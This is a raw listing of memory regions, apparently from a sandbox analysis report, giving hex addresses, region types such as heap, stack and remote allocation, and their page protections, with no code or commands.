|
trusted library allocation
|
page read and write
|
||
140252000
|
remote allocation
|
page execute and read and write
|
||
29DD3720000
|
heap
|
page read and write
|
||
7FFD347AB000
|
trusted library allocation
|
page execute and read and write
|
||
1EEBFDAC000
|
heap
|
page read and write
|
||
7FFD34B10000
|
trusted library allocation
|
page read and write
|
||
3AFF000
|
trusted library allocation
|
page read and write
|
||
13839000
|
trusted library allocation
|
page read and write
|
||
1D5AB000
|
heap
|
page read and write
|
||
232004AA000
|
heap
|
page read and write
|
||
140113000
|
remote allocation
|
page execute and read and write
|
||
270DEE3F000
|
heap
|
page read and write
|
||
7FFD34946000
|
trusted library allocation
|
page read and write
|
||
29DEC4A8000
|
heap
|
page read and write
|
||
1C6F4000
|
heap
|
page read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
642000
|
unkown
|
page readonly
|
||
29DD5DC1000
|
trusted library allocation
|
page read and write
|
||
10E5000
|
heap
|
page read and write
|
||
232003F1000
|
heap
|
page read and write
|
||
13CB2000
|
trusted library allocation
|
page read and write
|
||
29DD3E60000
|
heap
|
page read and write
|
||
F4C000
|
heap
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
1EEBFD8A000
|
heap
|
page read and write
|
||
7FFD34980000
|
trusted library allocation
|
page execute and read and write
|
||
1EEA5630000
|
heap
|
page execute and read and write
|
||
29DD5D76000
|
trusted library allocation
|
page read and write
|
||
1C8BB000
|
heap
|
page read and write
|
||
270D69FB000
|
trusted library allocation
|
page read and write
|
||
7FFD34BD0000
|
trusted library allocation
|
page read and write
|
||
7FFD349A2000
|
trusted library allocation
|
page read and write
|
||
29DD49F2000
|
trusted library allocation
|
page read and write
|
||
29DE3FC1000
|
trusted library allocation
|
page read and write
|
||
23724C6F000
|
heap
|
page read and write
|
||
29DE3FD1000
|
trusted library allocation
|
page read and write
|
||
1EEA534B000
|
heap
|
page read and write
|
||
798DF79000
|
stack
|
page read and write
|
||
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
23724C5D000
|
heap
|
page read and write
|
||
1411F000
|
trusted library allocation
|
page read and write
|
||
29DEC5E0000
|
heap
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
23200122000
|
heap
|
page read and write
|
||
1EEA58B0000
|
heap
|
page read and write
|
||
1CC3E000
|
stack
|
page read and write
|
||
2320010F000
|
heap
|
page read and write
|
||
DE1000
|
stack
|
page read and write
|
||
BD4E9FF000
|
stack
|
page read and write
|
||
7FFD34AF2000
|
trusted library allocation
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
1440F000
|
trusted library allocation
|
page read and write
|
||
140397000
|
remote allocation
|
page execute and read and write
|
||
E21000
|
stack
|
page read and write
|
||
1450000
|
trusted library allocation
|
page read and write
|
||
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
140292000
|
remote allocation
|
page execute and read and write
|
||
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
1403AE000
|
remote allocation
|
page execute and read and write
|
||
1EEBFE19000
|
heap
|
page read and write
|
||
29DE428C000
|
trusted library allocation
|
page read and write
|
||
4047000
|
trusted library allocation
|
page read and write
|
||
7FFD34B00000
|
trusted library allocation
|
page read and write
|
||
23265B40000
|
heap
|
page read and write
|
||
1404F5000
|
remote allocation
|
page execute and read and write
|
||
237251B0000
|
heap
|
page read and write
|
||
270C7E7D000
|
trusted library allocation
|
page read and write
|
||
798F04E000
|
stack
|
page read and write
|
||
14007D000
|
unkown
|
page execute and read and write
|
||
7FFD347A2000
|
trusted library allocation
|
page read and write
|
||
13581000
|
trusted library allocation
|
page read and write
|
||
2373D98C000
|
heap
|
page read and write
|
||
1EEBFD13000
|
heap
|
page read and write
|
||
270C65EA000
|
heap
|
page read and write
|
||
7FFD348A0000
|
trusted library allocation
|
page execute and read and write
|
||
ED0000
|
heap
|
page read and write
|
||
1EEB78A8000
|
trusted library allocation
|
page read and write
|
||
1C6B0000
|
heap
|
page read and write
|
||
14047C000
|
remote allocation
|
page execute and read and write
|
||
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
1EEA72F0000
|
trusted library allocation
|
page read and write
|
||
23267510000
|
heap
|
page read and write
|
||
140000000
|
remote allocation
|
page execute and read and write
|
||
7FFD34970000
|
trusted library allocation
|
page execute and read and write
|
||
2326768E000
|
trusted library allocation
|
page read and write
|
||
1EEBFDE4000
|
heap
|
page read and write
|
||
1EEBFDB2000
|
heap
|
page read and write
|
||
1401D3000
|
remote allocation
|
page execute and read and write
|
||
29DEC73A000
|
heap
|
page read and write
|
||
29DD5D9C000
|
trusted library allocation
|
page read and write
|
||
7FFD34764000
|
trusted library allocation
|
page read and write
|
||
7FFD3494B000
|
trusted library allocation
|
page read and write
|
||
3C53000
|
trusted library allocation
|
page read and write
|
||
23267962000
|
trusted library allocation
|
page read and write
|
||
1CFCF000
|
stack
|
page read and write
|
||
1EEA7337000
|
trusted library allocation
|
page read and write
|
||
29DD50BC000
|
trusted library allocation
|
page read and write
|
||
1EEBFD9E000
|
heap
|
page read and write
|
||
29DD3A70000
|
trusted library allocation
|
page read and write
|
||
2C93A46D000
|
heap
|
page read and write
|
||
7FFD34816000
|
trusted library allocation
|
page read and write
|
||
7FFD34988000
|
trusted library allocation
|
page read and write
|
||
29DD3A85000
|
heap
|
page read and write
|
||
7FFD34C00000
|
trusted library allocation
|
page read and write
|
||
7FFD34AF9000
|
trusted library allocation
|
page read and write
|
||
23724C59000
|
heap
|
page read and write
|
||
29DEBFA8000
|
heap
|
page read and write
|
||
1EEBFBBC000
|
heap
|
page read and write
|
||
3E18000
|
trusted library allocation
|
page read and write
|
||
ED2000
|
heap
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
640000
|
unkown
|
page readonly
|
||
140293000
|
unkown
|
page execute and read and write
|
||
D88AF8E000
|
stack
|
page read and write
|
||
3E86000
|
trusted library allocation
|
page read and write
|
||
1EEA7331000
|
trusted library allocation
|
page read and write
|
||
1EEA7490000
|
trusted library allocation
|
page read and write
|
||
2373DB0C000
|
heap
|
page read and write
|
||
138B9000
|
trusted library allocation
|
page read and write
|
||
7FFD3477D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34886000
|
trusted library allocation
|
page execute and read and write
|
||
1D775000
|
heap
|
page read and write
|
||
EF4388E000
|
stack
|
page read and write
|
||
7FFD3491E000
|
trusted library allocation
|
page read and write
|
||
1EEB7869000
|
trusted library allocation
|
page read and write
|
||
7FFD34982000
|
trusted library allocation
|
page read and write
|
||
7FFD34970000
|
trusted library allocation
|
page execute and read and write
|
||
29DD3F95000
|
heap
|
page read and write
|
||
7FFD349C6000
|
trusted library allocation
|
page read and write
|
||
29DD389F000
|
heap
|
page read and write
|
||
23267832000
|
trusted library allocation
|
page read and write
|
||
23265880000
|
heap
|
page read and write
|
||
36AA000
|
trusted library allocation
|
page read and write
|
||
23267A2B000
|
trusted library allocation
|
page read and write
|
||
7FFD34BE0000
|
trusted library allocation
|
page read and write
|
||
1D66F000
|
heap
|
page read and write
|
||
23200305000
|
heap
|
page read and write
|
||
23725270000
|
heap
|
page execute and read and write
|
||
EF42DBB000
|
stack
|
page read and write
|
||
139B9000
|
trusted library allocation
|
page read and write
|
||
23724D45000
|
heap
|
page read and write
|
||
1EEBFA55000
|
heap
|
page read and write
|
||
23735444000
|
trusted library allocation
|
page read and write
|
||
1EEA75BE000
|
trusted library allocation
|
page read and write
|
||
232004E4000
|
heap
|
page read and write
|
||
1EEBFC51000
|
heap
|
page read and write
|
||
232658D0000
|
trusted library allocation
|
page read and write
|
||
7FFD34784000
|
trusted library allocation
|
page read and write
|
||
2373D8AD000
|
heap
|
page read and write
|
||
1557000
|
heap
|
page read and write
|
||
1D4FF000
|
heap
|
page read and write
|
||
1400B2000
|
unkown
|
page execute and read and write
|
||
1EEA746E000
|
trusted library allocation
|
page read and write
|
||
1EEBF9F0000
|
heap
|
page read and write
|
||
7FFD349A9000
|
trusted library allocation
|
page read and write
|
||
1EEBFE01000
|
heap
|
page read and write
|
||
232005B0000
|
heap
|
page read and write
|
||
1404B0000
|
unkown
|
page execute and read and write
|
||
29DD3F00000
|
heap
|
page execute and read and write
|
||
40E5000
|
trusted library allocation
|
page read and write
|
||
36EA000
|
trusted library allocation
|
page read and write
|
||
232005F3000
|
heap
|
page read and write
|
||
2373DAB0000
|
heap
|
page read and write
|
||
1860000
|
heap
|
page read and write
|
||
270C5EA5000
|
heap
|
page read and write
|
||
1EEA75CA000
|
trusted library allocation
|
page read and write
|
||
1C8B6000
|
heap
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
3EBB000
|
trusted library allocation
|
page read and write
|
||
140A9000
|
trusted library allocation
|
page read and write
|
||
1EEA71B2000
|
trusted library allocation
|
page read and write
|
||
1EEBFC66000
|
heap
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
1D03F000
|
stack
|
page read and write
|
||
232005B6000
|
heap
|
page read and write
|
||
23726143000
|
trusted library allocation
|
page read and write
|
||
7FFD3478D000
|
trusted library allocation
|
page execute and read and write
|
||
1EEBFB96000
|
heap
|
page read and write
|
||
29DEC7AD000
|
heap
|
page read and write
|
||
2373DAE4000
|
heap
|
page read and write
|
||
23267AF8000
|
trusted library allocation
|
page read and write
|
||
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
1EEB7845000
|
trusted library allocation
|
page read and write
|
||
D889EFE000
|
stack
|
page read and write
|
||
7FFD34784000
|
trusted library allocation
|
page read and write
|
||
3D6F000
|
stack
|
page read and write
|
||
270DEDA4000
|
heap
|
page read and write
|
||
1D855000
|
heap
|
page read and write
|
||
7FFD347A4000
|
trusted library allocation
|
page read and write
|
||
7FFD34BD0000
|
trusted library allocation
|
page execute and read and write
|
||
1D7B8000
|
heap
|
page read and write
|
||
140396000
|
unkown
|
page execute and read and write
|
||
1430000
|
trusted library allocation
|
page read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
23267650000
|
trusted library allocation
|
page read and write
|
||
1C83F000
|
stack
|
page read and write
|
||
1D762000
|
heap
|
page read and write
|
||
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
7FFD34836000
|
trusted library allocation
|
page read and write
|
||
232002C4000
|
heap
|
page read and write
|
||
EF4287E000
|
stack
|
page read and write
|
||
7FFD34946000
|
trusted library allocation
|
page read and write
|
||
1404F9000
|
unkown
|
page execute and read and write
|
||
D88A179000
|
stack
|
page read and write
|
||
2373D956000
|
heap
|
page read and write
|
||
23267A49000
|
trusted library allocation
|
page read and write
|
||
29DEC76A000
|
heap
|
page read and write
|
||
7FFD34876000
|
trusted library allocation
|
page execute and read and write
|
||
14034F000
|
unkown
|
page execute and read and write
|
||
D88A337000
|
stack
|
page read and write
|
||
BD501FE000
|
stack
|
page read and write
|
||
29DD57C3000
|
trusted library allocation
|
page read and write
|
||
23277D32000
|
trusted library allocation
|
page read and write
|
||
1466000
|
heap
|
page read and write
|
||
3E9A000
|
trusted library allocation
|
page read and write
|
||
1EEA74BD000
|
trusted library allocation
|
page read and write
|
||
23265B45000
|
heap
|
page read and write
|
||
7FFD349C4000
|
trusted library allocation
|
page read and write
|
||
2326591B000
|
heap
|
page read and write
|
||
7FFD34794000
|
trusted library allocation
|
page read and write
|
||
23200651000
|
heap
|
page read and write
|
||
1D78F000
|
stack
|
page read and write
|
||
232002D8000
|
heap
|
page read and write
|
||
7FFD34AD0000
|
trusted library allocation
|
page read and write
|
||
270C6180000
|
heap
|
page read and write
|
||
3B2A000
|
trusted library allocation
|
page read and write
|
||
7FFD347FC000
|
trusted library allocation
|
page execute and read and write
|
||
1EEA534E000
|
heap
|
page read and write
|
||
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
2320068D000
|
heap
|
page read and write
|
||
7FFD34970000
|
trusted library allocation
|
page execute and read and write
|
||
13A9B000
|
trusted library allocation
|
page read and write
|
||
1EEA72DC000
|
trusted library allocation
|
page read and write
|
||
29DEC808000
|
heap
|
page read and write
|
||
140298000
|
unkown
|
page execute and read and write
|
||
1EEA5510000
|
heap
|
page read and write
|
||
7FFD34886000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD348BF000
|
trusted library allocation
|
page execute and read and write
|
||
270DEBF0000
|
heap
|
page read and write
|
||
7FFD347BD000
|
trusted library allocation
|
page execute and read and write
|
||
1EEA53EF000
|
heap
|
page read and write
|
||
1710000
|
heap
|
page execute and read and write
|
||
D889B63000
|
stack
|
page read and write
|
||
237251F0000
|
trusted library allocation
|
page read and write
|
||
18A0000
|
trusted library allocation
|
page read and write
|
||
232679C6000
|
trusted library allocation
|
page read and write
|
||
237271A7000
|
trusted library allocation
|
page read and write
|
||
232003E0000
|
heap
|
page read and write
|
||
7FFD34B9C000
|
trusted library allocation
|
page read and write
|
||
270C75FF000
|
trusted library allocation
|
page read and write
|
||
29DD3820000
|
heap
|
page read and write
|
||
13A07000
|
trusted library allocation
|
page read and write
|
||
23267A3D000
|
trusted library allocation
|
page read and write
|
||
2373D990000
|
heap
|
page read and write
|
||
237252D0000
|
trusted library allocation
|
page read and write
|
||
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
29DD4F33000
|
trusted library allocation
|
page read and write
|
||
7FFD34951000
|
trusted library allocation
|
page read and write
|
||
270C804B000
|
trusted library allocation
|
page read and write
|
||
14034A000
|
remote allocation
|
page execute and read and write
|
||
3B8E000
|
trusted library allocation
|
page read and write
|
||
1110000
|
heap
|
page read and write
|
||
14047E000
|
remote allocation
|
page execute and read and write
|
||
7FFD348B0000
|
trusted library allocation
|
page execute and read and write
|
||
13A87000
|
trusted library allocation
|
page read and write
|
||
1EEA71F6000
|
trusted library allocation
|
page read and write
|
||
1427000
|
heap
|
page read and write
|
||
1D88E000
|
heap
|
page read and write
|
||
7FFD34A80000
|
trusted library allocation
|
page read and write
|
||
1EEA5530000
|
heap
|
page read and write
|
||
1D784000
|
heap
|
page read and write
|
||
7FFD34960000
|
trusted library allocation
|
page execute and read and write
|
||
1434000
|
heap
|
page read and write
|
||
EF4277E000
|
stack
|
page read and write
|
||
23200483000
|
heap
|
page read and write
|
||
23277D03000
|
trusted library allocation
|
page read and write
|
||
1C9EE000
|
heap
|
page read and write
|
||
BD4F9FF000
|
stack
|
page read and write
|
||
1C8CD000
|
heap
|
page read and write
|
||
23265AA3000
|
heap
|
page execute and read and write
|
||
7FFD3499D000
|
trusted library allocation
|
page read and write
|
||
EE0000
|
heap
|
page read and write
|
||
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
1EEBFE21000
|
heap
|
page read and write
|
||
7FFD3481C000
|
trusted library allocation
|
page execute and read and write
|
||
237271EC000
|
trusted library allocation
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
7FFD3495A000
|
trusted library allocation
|
page read and write
|
||
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
270DEF4B000
|
heap
|
page read and write
|
||
1BAB0000
|
trusted library allocation
|
page read and write
|
||
270C8521000
|
trusted library allocation
|
page read and write
|
||
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
14032B000
|
remote allocation
|
page execute and read and write
|
||
798DFFD000
|
stack
|
page read and write
|
||
1EEA7234000
|
trusted library allocation
|
page read and write
|
||
1EEBFA17000
|
heap
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
EF426FF000
|
stack
|
page read and write
|
||
1D50000
|
heap
|
page read and write
|
||
23265BC5000
|
heap
|
page read and write
|
||
13D32000
|
trusted library allocation
|
page read and write
|
||
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
270DEB40000
|
heap
|
page read and write
|
||
270DEDB8000
|
heap
|
page read and write
|
||
2320066E000
|
heap
|
page read and write
|
||
1C720000
|
heap
|
page read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
2373DC6D000
|
heap
|
page read and write
|
||
7FFD34792000
|
trusted library allocation
|
page read and write
|
||
2326785A000
|
trusted library allocation
|
page read and write
|
||
270C65C0000
|
trusted library allocation
|
page read and write
|
||
1EEA753E000
|
trusted library allocation
|
page read and write
|
||
7FFD347FC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34856000
|
trusted library allocation
|
page read and write
|
||
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
D889FFE000
|
stack
|
page read and write
|
||
7FFD34964000
|
trusted library allocation
|
page read and write
|
||
2326737B000
|
heap
|
page read and write
|
||
23267791000
|
trusted library allocation
|
page read and write
|
||
29DEC6C4000
|
heap
|
page read and write
|
||
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
270C7705000
|
trusted library allocation
|
page read and write
|
||
232678DD000
|
trusted library allocation
|
page read and write
|
||
29DD52A0000
|
trusted library allocation
|
page read and write
|
||
1D44E000
|
heap
|
page read and write
|
||
1D7F7000
|
heap
|
page read and write
|
||
798DD7F000
|
stack
|
page read and write
|
||
2373D952000
|
heap
|
page read and write
|
||
1EEBFA77000
|
heap
|
page read and write
|
||
3C28000
|
trusted library allocation
|
page read and write
|
||
7FFD34BC0000
|
trusted library allocation
|
page read and write
|
||
1404EA000
|
remote allocation
|
page execute and read and write
|
||
1CA61000
|
heap
|
page read and write
|
||
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
29DD3A80000
|
heap
|
page read and write
|
||
140273000
|
remote allocation
|
page execute and read and write
|
||
29DE3FA1000
|
trusted library allocation
|
page read and write
|
||
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
7FFD347EC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34B8A000
|
trusted library allocation
|
page read and write
|
||
7FFD34978000
|
trusted library allocation
|
page read and write
|
||
270D6774000
|
trusted library allocation
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
3E4F000
|
trusted library allocation
|
page read and write
|
||
29DEC7EB000
|
heap
|
page read and write
|
||
23724C4E000
|
heap
|
page read and write
|
||
433B000
|
trusted library allocation
|
page read and write
|
||
1D457000
|
heap
|
page read and write
|
||
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
3C34000
|
trusted library allocation
|
page read and write
|
||
23200619000
|
heap
|
page read and write
|
||
237264EE000
|
trusted library allocation
|
page read and write
|
||
1EEBF994000
|
heap
|
page read and write
|
||
798E1FD000
|
stack
|
page read and write
|
||
23726B00000
|
trusted library allocation
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
23724C19000
|
heap
|
page read and write
|
||
14351000
|
trusted library allocation
|
page read and write
|
||
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
1388000
|
heap
|
page read and write
|
||
1404FC000
|
remote allocation
|
page execute and read and write
|
||
1EEBFAE4000
|
heap
|
page read and write
|
||
7FFD349BE000
|
trusted library allocation
|
page read and write
|
||
13D77000
|
trusted library allocation
|
page read and write
|
||
1D441000
|
heap
|
page read and write
|
||
7FFD34850000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
1D643000
|
heap
|
page read and write
|
||
1EEA7366000
|
trusted library allocation
|
page read and write
|
||
185F000
|
stack
|
page read and write
|
||
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
23724D10000
|
heap
|
page read and write
|
||
7FFD349E6000
|
trusted library allocation
|
page read and write
|
||
3D08000
|
trusted library allocation
|
page read and write
|
||
237265DD000
|
trusted library allocation
|
page read and write
|
||
7FFD347DC000
|
trusted library allocation
|
page execute and read and write
|
||
2373DC86000
|
heap
|
page read and write
|
||
7FFD34A30000
|
trusted library allocation
|
page execute and read and write
|
||
23200080000
|
heap
|
page read and write
|
||
7FFD347A3000
|
trusted library allocation
|
page execute and read and write
|
||
140272000
|
remote allocation
|
page execute and read and write
|
||
E80000
|
heap
|
page read and write
|
||
F6E000
|
heap
|
page read and write
|
||
23726C5A000
|
trusted library allocation
|
page read and write
|
||
23277DC8000
|
trusted library allocation
|
page read and write
|
||
270DEAB7000
|
heap
|
page execute and read and write
|
||
23724C96000
|
heap
|
page read and write
|
||
2320014A000
|
heap
|
page read and write
|
||
23267AAD000
|
trusted library allocation
|
page read and write
|
||
3C7C000
|
trusted library allocation
|
page read and write
|
||
7FFD347B2000
|
trusted library allocation
|
page read and write
|
||
1EEA71E9000
|
trusted library allocation
|
page read and write
|
||
2326760D000
|
trusted library allocation
|
page read and write
|
||
1EEBFD06000
|
heap
|
page read and write
|
||
1400E8000
|
remote allocation
|
page execute and read and write
|
||
232777BD000
|
trusted library allocation
|
page read and write
|
||
23265932000
|
heap
|
page read and write
|
||
23267750000
|
trusted library allocation
|
page read and write
|
||
29DD5DBC000
|
trusted library allocation
|
page read and write
|
||
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
29DD5802000
|
trusted library allocation
|
page read and write
|
||
35F0000
|
heap
|
page execute and read and write
|
||
7B0000
|
heap
|
page read and write
|
||
1D78C000
|
heap
|
page read and write
|
||
D88A53F000
|
stack
|
page read and write
|
||
237253B0000
|
trusted library allocation
|
page read and write
|
||
23200497000
|
heap
|
page read and write
|
||
D88A236000
|
stack
|
page read and write
|
||
29DEC742000
|
heap
|
page read and write
|
||
1D7AC000
|
heap
|
page read and write
|
||
7FFD34B00000
|
trusted library allocation
|
page read and write
|
||
23724D0B000
|
heap
|
page read and write
|
||
7FFD34856000
|
trusted library allocation
|
page read and write
|
||
1910000
|
heap
|
page read and write
|
||
23277D83000
|
trusted library allocation
|
page read and write
|
||
3ECE000
|
trusted library allocation
|
page read and write
|
||
7FFD347AD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD3485C000
|
trusted library allocation
|
page execute and read and write
|
||
3F17000
|
trusted library allocation
|
page read and write
|
||
1EEA5409000
|
heap
|
page read and write
|
||
EF4378E000
|
stack
|
page read and write
|
||
BD4EDFF000
|
stack
|
page read and write
|
||
232679E2000
|
trusted library allocation
|
page read and write
|
||
1EEBFD82000
|
heap
|
page read and write
|
||
23200673000
|
heap
|
page read and write
|
||
F23000
|
heap
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
1CFFE000
|
stack
|
page read and write
|
||
EF42BB8000
|
stack
|
page read and write
|
||
7FFD34C00000
|
trusted library allocation
|
page read and write
|
||
1D045000
|
heap
|
page read and write
|
||
EF4297D000
|
stack
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
1401D1000
|
remote allocation
|
page execute and read and write
|
||
1400B1000
|
remote allocation
|
page execute and read and write
|
||
1EEA5320000
|
heap
|
page read and write
|
||
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
EEC000
|
heap
|
page read and write
|
||
2320030C000
|
heap
|
page read and write
|
||
7FFD34794000
|
trusted library allocation
|
page read and write
|
||
785000
|
heap
|
page read and write
|
||
3D58000
|
trusted library allocation
|
page read and write
|
||
23724D40000
|
heap
|
page read and write
|
||
D88A1BE000
|
stack
|
page read and write
|
||
1C9BB000
|
heap
|
page read and write
|
||
7FFD347BB000
|
trusted library allocation
|
page read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
7FFD34960000
|
trusted library allocation
|
page execute and read and write
|
||
13FC9000
|
trusted library allocation
|
page read and write
|
||
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
93869FC000
|
stack
|
page read and write
|
||
1EEBFBD4000
|
heap
|
page read and write
|
||
1D5D0000
|
trusted library section
|
page read and write
|
||
23200409000
|
heap
|
page read and write
|
||
29DEC7C4000
|
heap
|
page read and write
|
||
7FFD34982000
|
trusted library allocation
|
page read and write
|
||
14032A000
|
remote allocation
|
page execute and read and write
|
||
7FFD34AF8000
|
trusted library allocation
|
page read and write
|
||
270D6721000
|
trusted library allocation
|
page read and write
|
||
3B6A000
|
trusted library allocation
|
page read and write
|
||
270D69F3000
|
trusted library allocation
|
page read and write
|
||
7FFD347AD000
|
trusted library allocation
|
page execute and read and write
|
||
1EEA74AA000
|
trusted library allocation
|
page read and write
|
||
7FFD34860000
|
trusted library allocation
|
page execute and read and write
|
||
29DD3887000
|
heap
|
page read and write
|
||
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
1C793000
|
heap
|
page read and write
|
||
7FFD34BC0000
|
trusted library allocation
|
page execute and read and write
|
||
23277814000
|
trusted library allocation
|
page read and write
|
||
232005C0000
|
heap
|
page read and write
|
||
1EEBF9FC000
|
heap
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
EBB000
|
heap
|
page read and write
|
||
1EEA76F4000
|
trusted library allocation
|
page read and write
|
||
798E0F6000
|
stack
|
page read and write
|
||
14047A000
|
unkown
|
page execute and read and write
|
||
7FFD3478D000
|
trusted library allocation
|
page execute and read and write
|
||
1D471000
|
heap
|
page read and write
|
||
29DD3800000
|
heap
|
page read and write
|
||
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
2320013E000
|
heap
|
page read and write
|
||
346F000
|
stack
|
page read and write
|
||
1401A000
|
trusted library allocation
|
page read and write
|
||
7FFD34A40000
|
trusted library allocation
|
page read and write
|
||
1EEB7975000
|
trusted library allocation
|
page read and write
|
||
232004C0000
|
heap
|
page read and write
|
||
434E000
|
trusted library allocation
|
page read and write
|
||
1EEB78D7000
|
trusted library allocation
|
page read and write
|
||
1D59B000
|
heap
|
page read and write
|
||
1EEA7297000
|
trusted library allocation
|
page read and write
|
||
23267969000
|
trusted library allocation
|
page read and write
|
||
35D0000
|
heap
|
page execute and read and write
|
||
1EEBFA7C000
|
heap
|
page read and write
|
||
1EEA722E000
|
trusted library allocation
|
page read and write
|
||
140479000
|
remote allocation
|
page execute and read and write
|
||
232009F0000
|
heap
|
page execute and read and write
|
||
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
3774000
|
heap
|
page read and write
|
||
23726FE6000
|
trusted library allocation
|
page read and write
|
||
D889F79000
|
stack
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
1D639000
|
heap
|
page read and write
|
||
13C9000
|
heap
|
page read and write
|
||
14013B000
|
remote allocation
|
page execute and read and write
|
||
7FFD3476D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
7FFD34BE6000
|
trusted library allocation
|
page read and write
|
||
1D747000
|
heap
|
page read and write
|
||
2320057C000
|
heap
|
page read and write
|
||
1EEBFA1F000
|
heap
|
page read and write
|
||
1C9B8000
|
heap
|
page read and write
|
||
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
F8D15FF000
|
stack
|
page read and write
|
||
7FFD34AF0000
|
trusted library allocation
|
page read and write
|
||
EF4380C000
|
stack
|
page read and write
|
||
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
EF42B3E000
|
stack
|
page read and write
|
||
2C8B7040000
|
heap
|
page read and write
|
||
23724C55000
|
heap
|
page read and write
|
||
7FFD348FF000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
270C65D0000
|
heap
|
page execute and read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
270DEAB0000
|
heap
|
page execute and read and write
|
||
23267712000
|
trusted library allocation
|
page read and write
|
||
232004CD000
|
heap
|
page read and write
|
||
D88A2BB000
|
stack
|
page read and write
|
||
1D739000
|
heap
|
page read and write
|
||
2326781F000
|
trusted library allocation
|
page read and write
|
||
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
232659BC000
|
heap
|
page read and write
|
||
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
7FFD349C3000
|
trusted library allocation
|
page read and write
|
||
3EEE000
|
trusted library allocation
|
page read and write
|
||
13B11000
|
trusted library allocation
|
page read and write
|
||
7FFD34939000
|
trusted library allocation
|
page read and write
|
||
1EEBFC71000
|
heap
|
page read and write
|
||
232679B2000
|
trusted library allocation
|
page read and write
|
||
7FFD347A4000
|
trusted library allocation
|
page read and write
|
||
270DEDE2000
|
heap
|
page read and write
|
||
93865FE000
|
stack
|
page read and write
|
||
7FFD347A4000
|
trusted library allocation
|
page read and write
|
||
798DE7A000
|
stack
|
page read and write
|
||
1EEA5200000
|
unkown
|
page readonly
|
||
3EF5000
|
trusted library allocation
|
page read and write
|
||
7FFD34932000
|
trusted library allocation
|
page read and write
|
||
23200173000
|
heap
|
page read and write
|
||
1C700000
|
heap
|
page read and write
|
||
1D786000
|
heap
|
page read and write
|
||
270C6140000
|
heap
|
page read and write
|
||
2C8B5670000
|
heap
|
page read and write
|
||
7FFD34876000
|
trusted library allocation
|
page execute and read and write
|
||
1EEBFA5C000
|
heap
|
page read and write
|
||
270C6150000
|
trusted library section
|
page read and write
|
||
29DD3E40000
|
heap
|
page readonly
|
||
232000C1000
|
heap
|
page read and write
|
||
232004C2000
|
heap
|
page read and write
|
||
23200665000
|
heap
|
page read and write
|
||
1402BB000
|
remote allocation
|
page execute and read and write
|
||
1EEBFA68000
|
heap
|
page read and write
|
||
232005BE000
|
heap
|
page read and write
|
||
7FFD347A3000
|
trusted library allocation
|
page execute and read and write
|
||
1EEA55A0000
|
trusted library allocation
|
page read and write
|
||
1D38E000
|
stack
|
page read and write
|
||
1EEBFAE7000
|
heap
|
page read and write
|
||
4135000
|
trusted library allocation
|
page read and write
|
||
F8D12FD000
|
stack
|
page read and write
|
||
2373D92E000
|
heap
|
page read and write
|
||
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
